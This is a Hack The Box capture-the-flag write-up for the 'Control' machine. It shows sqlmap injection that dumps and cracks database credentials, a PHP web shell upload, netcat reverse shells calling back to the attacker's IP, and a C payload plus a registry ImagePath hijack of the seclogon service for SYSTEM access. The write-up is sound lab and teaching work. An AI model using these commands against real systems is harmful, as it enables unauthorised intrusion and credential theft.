Hackthebox – Control
As with any machine, Control starts with a port scan.
root@kalivm:~/Control# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 08:01 CEST
# Nmap 7.80 scan initiated Sun Mar 15 15:43:57 2020 as: nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/15%Time=5E6E4110%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindR
SF:eqTCP,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 537.85 secondsThe only interesting ports are 80 and 3306, but for 3306 I Would probably need credentials so I start browsing through the website.
Fidelity… I thought this box was named Control.. but ok.. sure, lets go with this.
After clicking the admin link, I get this error stating that it needs a certain header. I recalled this X-Forwarded-For header being something, used as verification of forwarding through proxies, but all I needed was a valid source to let it come from.
Looking into the source of the main page, showed me this IP address. I might as well try that as a header
Using burpsuite as proxy, I set the scope to 10.10.10.167 and set the header to be added to all requests sent by my browser.
After changing my browser to use Burp as Proxy, I can browse the admin pages. These pages contain lots of fields and buttons…. So I start messing around with them a bit.
After trying many of the options, I find that only the searchfield returns this error, so I continue with that. While inspecting the traffic with Burp I see that the productName variable is sent, so I throw that in sqlmap.
root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 -a
___
__H__
___ ___[)]_____ ___ ___ {1.4.3#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
----snip----
[09:04:08] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'
---snip---
[09:04:36] [INFO] cracked password 'l3tm3!n' for user 'manager'
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDAtext password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
---snip---Using Burpsuite as proxy, since the x-forwarded-for header was required too, sqlmap quite quickly determines that the provided parameter is vulnerable, and after some messing with sqlmap, I use the -a option to just dump everything it can.
Not only does it get the password hashes for users Manager (l3tm3!n) and Hector (not cracked), it also shows that all users have ‘File’ permissions which indicates that they can write to the filesystem. This might be my way in!
root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 --file-write=/opt/wwwolf-php-webshell/webshell.php --file-dest=c:/inetpub/wwwroot/sedje.php --batch
___
__H__
___ ___[)]_____ ___ ___ {1.4.3#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
---snip---
do you want confirmation that the local file '/opt/wwwolf-php-webshell/webshell.php' has been successfully written on the back-end DBMS file system ('c:/inetpub/wwwroot/sedje.php')? [Y/n] Y
[09:30:44] [INFO] the local file '/opt/wwwolf-php-webshell/webshell.php' and the remote file 'c:/inetpub/wwwroot/sedje.php' have the same size (7205 B)
[09:30:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'After trying several files including the nishang powershell reverse shell and the common php-reverse shell on kali, many attempts got blocked for further writing so it appeared as if some security tool was active. After trying several shells, I was finally able to upload this wolf-shell to disk!
Using this shell, I created a new temp directory and uploaded nc.exe.
root@kalivm:~/Control# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.167 49673
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\temp> whoami
whoami
nt authority\iusrOnce that got uploaded, I could spawn my shell as iusr. Time to start looking around for more stuff on this system. After spending a lot of time enumerating things, I could not find any feasible way to escalate my privileges to another user. However, one person on discord mentioned that I should also look (again) at the obtained hashes from the SQL Dump. That was when I realized I had never cracked Hector’s password!
Both the root hash and Hector’s hash were thrown into crackstation, but only Hector’s hash got a result. So with this, I should be able to set my shell to Hector.
root@kalivm:~/Control# cat ~/exploit/powershell/getshell.ps1
$username = 'Control\Hector'
$password = 'l33th4x0rhector'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
Invoke-Command -ComputerName 127.0.0.1 -Credential $credential -ScriptBlock {cmd /c powershell c:\temp\nc.exe 10.10.14.76 9003 -e powershell.exe}This is where I combine my own appraoch for Hackthebox – Sniper with that of Ippsec. I create a simple powershell script with the credentials, and the netcat command back to my machine to get a shell as Hector.
PS C:\temp> iwr -uri http://10.10.14.76/powershell/getshell.ps1 -outfile sedje.ps1
iwr -uri http://10.10.14.76/powershell/getshell.ps1 -outfile sedje.ps1
PS C:\temp> ./sedje.ps1
./sedje.ps1
Program 'nc.exe' failed to run: Access is deniedAt line:1 char:1
+ CategoryInfo : NotSpecified: (Program 'nc.exe...t line:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : 127.0.0.1Thats weird, I cannot access nc.exe due to permission problems. After some googling about how to change permissions on it, I found something that was way more complex than the way its being done on linux, but hey, it might be worth a try.
PS C:\temp> $Acl = Get-Acl "c:\temp\"
$Acl = Get-Acl "c:\temp\
PS C:\temp> $Ar = New-Object system.security.accesscontrol.filesystemaccessrule("Everyone","FullControl","Allow")
$Ar = New-Object system.security.accesscontrol.filesystemaccessrule("Everyone","FullControl","Allow")
PS C:\temp> $Acl.SetAccessRule($Ar)
$Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp" $acl
Set-Acl "C:\temp" $acl
PS C:\temp> $Acl = Get-Acl "c:\temp\nc.exe"
$Acl = Get-Acl "c:\temp\nc.exe"
PS C:\temp> $Acl.SetAccessRule($Ar)
$Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp\nc.exe" $acl
Set-Acl "C:\temp\nc.exe" $acl
PS C:\temp> ./sedje.ps1
./sedje.ps1Changing the ACL on nc.exe and c:\temp appeared to have worked! Now I should have a shell as Hector.
root@kalivm:~/Control# rlwrap nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.167 49678
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Hector\Documents> whoami
whoami
control\hectorI do have a shell as Hector. So perhaps I can get the user flag now. But before doing so there is one thing I want to do.
PS C:\Users\Hector\Documents> del c:\temp\sedje.ps1
del c:\temp\sedje.ps1In order to not make it too easy for anyone else reading the temp directory, I remove the ps1 file containing the username and password for Hector.
PS C:\Users\Hector\Documents> cd ..\desktop
cd ..\desktop
PS C:\Users\Hector\desktop> dir
dir
Directory: C:\Users\Hector\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/1/2019 12:33 PM 32 user.txt
PS C:\Users\Hector\desktop> type user.txt
type user.txt
d8782dd<NOFLAG>2c4b5ba77ef2d472bAnd there is the flag! Time to obtain it and continue to privilege escalation.
Privilege escalation
So during the first hours of privilege escalation, I did not find much of interest except for this piece of PowerShell History for Hector. I looked at each of the commands but could still not find much useful content in their results.
PS C:\Users\Hector\desktop> (Get-PSReadlineOption).HistorySavePath
(Get-PSReadlineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\desktop> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-listHowever, at some point, I started discussing the box on Discord and someone told me to look into the services.
PS C:\temp> get-service
get-service
get-service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ get-service
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
PS C:\temp> sc.exe query
sc.exe query
[SC] OpenSCManager FAILED 5:
Access is denied.The normal way of querying the services did not work though. All it got was either a permission denied or a InvalidOperationException error, so there is no easy way of listing them all.
PS C:\Users\Hector\desktop> get-acl HKLM:\SYSTEM\CurrentControlSet\Services\* | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet\Services\* | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Data
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
CONTROL\Hector Allow FullControl
BUILTIN\Administrators Allow FullControl
---snip---After some research, I found that I could also query the registry for all services. Looking at the service permissions, it appeared as if Hector had FullControl permissions on all of them. This could be interesting, however, when trying to stop some of them, I got either a permission denied error or an Service Not found error. Perhaps I needed services that were not started yet.
PS C:\temp> $services = get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\*" | Where-Object {$_.ObjectName -eq "LocalSystem" -and $_.Start -eq 3 } | Select-Object -Property PSChildName
$services = get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\*" | Where-Object {$_.ObjectName -eq "LocalSystem" -and $_.Start -eq 3 } | Select-Object -Property PSChildName
PS C:\temp> foreach ($service in $services) { get-service -name $service.pschildname -erroraction 'silentlycontinue' | Where-Object {$_.Status -eq 'Stopped'} |Select-Object -Property Name }
foreach ($service in $services) { get-service -name $service.pschildname -erroraction 'silentlycontinue' | Where-Object {$_.Status -eq 'Stopped'} |Select-Object -Property Name }
Name
----
AppMgmt
ConsentUxUserSvc
DevicesFlowUserSvc
EFS
NetSetupSvc
NgcSvc
PimIndexMaintenanceSvc
PrintWorkflowUserSvc
RasAuto
RSoPProv
seclogon
SecurityHealthService
SensorService
UnistoreSvc
UserDataSvc
vds
WaaSMedicSvcSome more research online lead me to the queries above. They provided these services which were potential candidates for tampering with them. They were configured with Start-option 3 (Manual), configured to run as LocalSystem and were not (yet) started. Now all I needed was an executable to run with it, as when I run netcat as a service, it might probably be blocked by Defender, or be killed as soon as the service-start times out because it cannot background the service.
root@kalivm:~/Control# cat getnc.c
# include <stdio.h>
# include <stdlib.h>
# include <string.h>
int main(){
char command[80];
strcpy(command, "cmd /c c:\\temp\\nc.exe 10.10.14.76 9004 -e powershell");
system(command);
return 0;
}
root@kalivm:~/Control# x86_64-w64-mingw32-gcc -o getnc.exe getnc.cSo I crosscompile this simple executable which starts a new cmd command with a netcat connection back to my box.
PS C:\temp> iwr -uri http://10.10.14.76/windows/getnc.exe -outfile getnc.exe
iwr -uri http://10.10.14.76/windows/getnc.exe -outfile getnc.exeI transfer the file from my kali box to the Windows target.
PS C:\temp> set-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon" -Name ImagePath -value "C:\temp\getnc.exe"
set-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon" -Name ImagePath -value "C:\temp\getnc.exe"
PS C:\temp> get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon"
get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon"
Description : @%SystemRoot%\system32\seclogon.dll,-7000
DisplayName : @%SystemRoot%\system32\seclogon.dll,-7001
ErrorControl : 1
FailureActions : {128, 81, 1, 0...}
ImagePath : C:\temp\getnc.exe
ObjectName : LocalSystem
RequiredPrivileges : {SeTcbPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeAssignPrimaryTokenPrivilege...}
Start : 3
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
PSChildName : seclogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\RegistryFrom the list, I select the seclogon service as a candidate and reconfigure the ImagePath variable to contain my payload.
PS C:\temp> sc.exe start seclogon
sc.exe start seclogon
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.I start the service, and it crashes as expected. However, maybe I have got my System shell now if all went well.
root@kalivm:~/Control# rlwrap nc -nlvp 9004
Listening on 0.0.0.0 9004
Connection received on 10.10.10.167 49703
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\systemAnd it did! I’ve got a shell as SYSTEM user so I can now gain access to the root flag!
PS C:\Windows\system32> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/1/2019 12:33 PM 32 root.txt
PS C:\users\administrator\desktop> type root.txt
type root.txt
8f8613f5<NOFLAG>36ef11def4cec1b1And there it is! What a ride this was, and I learned a lot about the registry values!
